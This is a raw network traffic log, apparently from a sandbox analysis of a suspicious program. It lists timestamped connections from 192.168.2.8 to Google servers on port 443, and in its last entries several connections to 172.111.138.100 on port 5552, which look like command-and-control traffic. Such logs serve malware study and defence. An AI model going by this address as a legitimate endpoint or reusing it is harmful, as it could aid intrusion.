                                                                                                                                                                            Dec 30, 2024 11:49:36.888062000 CET49854443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:36.888079882 CET44349854142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:36.985316992 CET49853443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:36.985338926 CET44349853142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:36.986155987 CET49860443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:36.986160040 CET49861443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:36.986202955 CET44349860142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:36.986203909 CET44349861142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:36.987483025 CET49860443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:36.987487078 CET49861443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:36.987889051 CET49861443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:36.987900972 CET44349861142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.207479000 CET49860443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:37.207511902 CET44349860142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.476191044 CET44349858142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.476247072 CET49858443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:37.476689100 CET49858443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:37.476695061 CET44349858142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.478471041 CET49858443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:37.478477001 CET44349858142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.482949018 CET44349859142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.483056068 CET49859443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:37.491827965 CET49859443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:37.491857052 CET44349859142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.493889093 CET49859443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:37.493895054 CET44349859142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.625885963 CET44349861142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.626055956 CET49861443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:37.626519918 CET49861443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:37.626529932 CET44349861142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.626707077 CET49861443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:37.626715899 CET44349861142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.808238983 CET44349860142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.808298111 CET49860443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:37.813591957 CET49860443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:37.813610077 CET44349860142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.813782930 CET49860443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:37.813788891 CET44349860142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.857527018 CET44349859142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.858014107 CET49859443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:37.858038902 CET44349859142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.858138084 CET49859443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:37.858222008 CET44349859142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.858269930 CET44349859142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.858282089 CET49859443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:37.858282089 CET49859443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:37.858300924 CET44349859142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.858336926 CET49859443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:37.859164953 CET49862443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:37.859214067 CET44349862142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.859335899 CET49862443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:37.859790087 CET49862443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:37.859805107 CET44349862142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.893045902 CET44349858142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.893096924 CET44349858142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.893105984 CET49858443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:37.893134117 CET44349858142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.893151999 CET49858443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:37.893179893 CET49858443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:37.893186092 CET44349858142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.893215895 CET44349858142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.893237114 CET49858443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:37.893255949 CET49858443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:37.894957066 CET49858443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:37.894974947 CET44349858142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.895410061 CET49863443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:37.895447016 CET44349863142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.895826101 CET49863443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:37.896045923 CET49863443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:37.896053076 CET44349863142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.995645046 CET44349861142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.995752096 CET49861443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:37.995780945 CET44349861142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.995794058 CET44349861142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:37.995824099 CET49861443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:37.995842934 CET49861443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:38.008467913 CET49861443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:38.008497953 CET44349861142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.009267092 CET49864443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:38.009314060 CET44349864142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.009372950 CET49864443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:38.009682894 CET49864443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:38.009696007 CET44349864142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.211952925 CET44349860142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.212012053 CET44349860142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.212013006 CET49860443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:38.212023973 CET44349860142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.212061882 CET49860443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:38.212068081 CET44349860142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.212119102 CET44349860142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.212124109 CET49860443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:38.212162018 CET49860443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:38.213104963 CET49860443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:38.213110924 CET44349860142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.213671923 CET49865443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:38.213695049 CET44349865142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.213793993 CET49865443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:38.214109898 CET49865443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:38.214122057 CET44349865142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.469505072 CET44349862142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.469582081 CET49862443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:38.470125914 CET49862443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:38.470132113 CET44349862142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.470427036 CET49862443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:38.470432043 CET44349862142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.496143103 CET44349863142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.496223927 CET49863443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:38.500811100 CET49863443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:38.500821114 CET44349863142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.500998974 CET49863443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:38.501004934 CET44349863142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.610991955 CET44349864142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.611053944 CET49864443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:38.611473083 CET49864443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:38.611485958 CET44349864142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.611671925 CET49864443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:38.611677885 CET44349864142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.812901020 CET44349865142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.812995911 CET49865443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:38.814603090 CET49865443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:38.814615965 CET44349865142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.814860106 CET49865443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:38.814867020 CET44349865142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.844027042 CET44349862142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.844528913 CET44349862142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.844567060 CET49862443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:38.844609022 CET49862443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:38.844906092 CET49862443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:38.844921112 CET44349862142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.845949888 CET49867443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:38.845993042 CET44349867142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.846304893 CET49867443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:38.846803904 CET49867443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:38.846816063 CET44349867142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.903124094 CET44349863142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.903162003 CET44349863142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.903215885 CET49863443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:38.903228998 CET44349863142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.903242111 CET49863443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:38.903271914 CET49863443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:38.903275013 CET44349863142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.903326988 CET44349863142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.903336048 CET49863443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:38.903367996 CET49863443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:38.904119015 CET49863443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:38.904134035 CET44349863142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.904707909 CET49868443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:38.904751062 CET44349868142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.904833078 CET49868443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:38.905071974 CET49868443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:38.905090094 CET44349868142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.979144096 CET44349864142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.979208946 CET49864443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:38.979362965 CET49864443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:38.979404926 CET44349864142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.979463100 CET49864443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:38.980070114 CET49869443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:38.980138063 CET44349869142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:38.980210066 CET49869443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:38.980731964 CET49869443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:38.980755091 CET44349869142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.216939926 CET44349865142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.217019081 CET44349865142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.217039108 CET49865443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:39.217067957 CET44349865142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.217080116 CET49865443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:39.217108011 CET49865443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:39.217113972 CET44349865142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.217154026 CET44349865142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.217171907 CET49865443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:39.217202902 CET49865443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:39.237627983 CET49865443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:39.237672091 CET44349865142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.243905067 CET49870443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:39.243949890 CET44349870142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.244081020 CET49870443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:39.244884014 CET49870443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:39.244896889 CET44349870142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.445929050 CET44349867142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.446003914 CET49867443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:39.446713924 CET44349867142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.446779013 CET49867443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:39.451147079 CET49867443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:39.451164961 CET44349867142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.451442003 CET44349867142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.451489925 CET49867443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:39.451888084 CET49867443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:39.495340109 CET44349867142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.503576994 CET44349868142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.503658056 CET49868443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:39.504232883 CET49868443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:39.504249096 CET44349868142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.506149054 CET49868443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:39.506155014 CET44349868142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.583785057 CET44349869142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.583874941 CET49869443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:39.584573030 CET44349869142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.584630966 CET49869443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:39.586134911 CET49869443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:39.586146116 CET44349869142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.586394072 CET44349869142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.586440086 CET49869443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:39.587189913 CET49869443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:39.631331921 CET44349869142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.745970011 CET49870443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:39.746062994 CET49867443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:39.746113062 CET49868443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:39.746114969 CET49869443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:39.747864008 CET49873443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:39.747900009 CET44349873142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.747999907 CET49873443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:39.749110937 CET49873443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:39.749116898 CET44349873142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.751142979 CET49874443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:39.751174927 CET44349874142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:39.751255989 CET49874443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:39.752273083 CET49874443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:39.752288103 CET44349874142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:40.346894026 CET44349873142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:40.347121000 CET49873443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:40.347533941 CET49873443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:40.347543001 CET44349873142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:40.347788095 CET49873443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:40.347794056 CET44349873142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:40.362138987 CET44349874142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:40.362246037 CET49874443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:40.362987995 CET49874443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:40.362996101 CET44349874142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:40.363086939 CET49874443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:40.363090992 CET44349874142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:40.711401939 CET44349873142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:40.711765051 CET49873443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:40.711780071 CET44349873142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:40.711807966 CET44349873142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:40.711826086 CET49873443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:40.711889982 CET49873443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:40.712214947 CET49873443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:40.712229967 CET44349873142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:40.712980986 CET49875443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:40.713006020 CET44349875142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:40.713237047 CET49875443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:40.716109037 CET49875443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:40.716119051 CET44349875142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:40.717205048 CET49876443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:40.717256069 CET44349876142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:40.717442036 CET49876443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:40.717989922 CET49876443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:40.718000889 CET44349876142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:40.738239050 CET44349874142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:40.738351107 CET49874443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:40.738383055 CET44349874142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:40.738512039 CET49874443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:40.738512039 CET49874443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:40.738543034 CET44349874142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:40.738641024 CET49874443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:40.739854097 CET49877443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:40.739897013 CET44349877142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:40.740082026 CET49878443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:40.740109921 CET44349878142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:40.740179062 CET49878443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:40.740225077 CET49877443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:40.740927935 CET49877443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:40.740957975 CET44349877142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:40.741069078 CET49878443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:40.741079092 CET44349878142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.043530941 CET498795552192.168.2.8172.111.138.100
                                                                                                                                                                            Dec 30, 2024 11:49:41.048290968 CET555249879172.111.138.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.048377991 CET498795552192.168.2.8172.111.138.100
                                                                                                                                                                            Dec 30, 2024 11:49:41.048758984 CET498795552192.168.2.8172.111.138.100
                                                                                                                                                                            Dec 30, 2024 11:49:41.053607941 CET555249879172.111.138.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.315609932 CET44349875142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.315676928 CET49875443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:41.316445112 CET44349875142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.316492081 CET49875443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:41.320384979 CET49875443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:41.320396900 CET44349875142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.320657015 CET44349875142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.320730925 CET49875443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:41.321197987 CET49875443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:41.338474989 CET44349876142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.338581085 CET49876443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:41.343553066 CET49876443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:41.343574047 CET44349876142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.343799114 CET44349876142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.343854904 CET49876443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:41.344341993 CET49876443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:41.348916054 CET44349878142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.348988056 CET49878443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:41.349684000 CET44349878142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.349733114 CET49878443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:41.351460934 CET49878443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:41.351473093 CET44349878142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.351707935 CET44349878142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:41.351845980 CET49878443192.168.2.8142.250.185.78
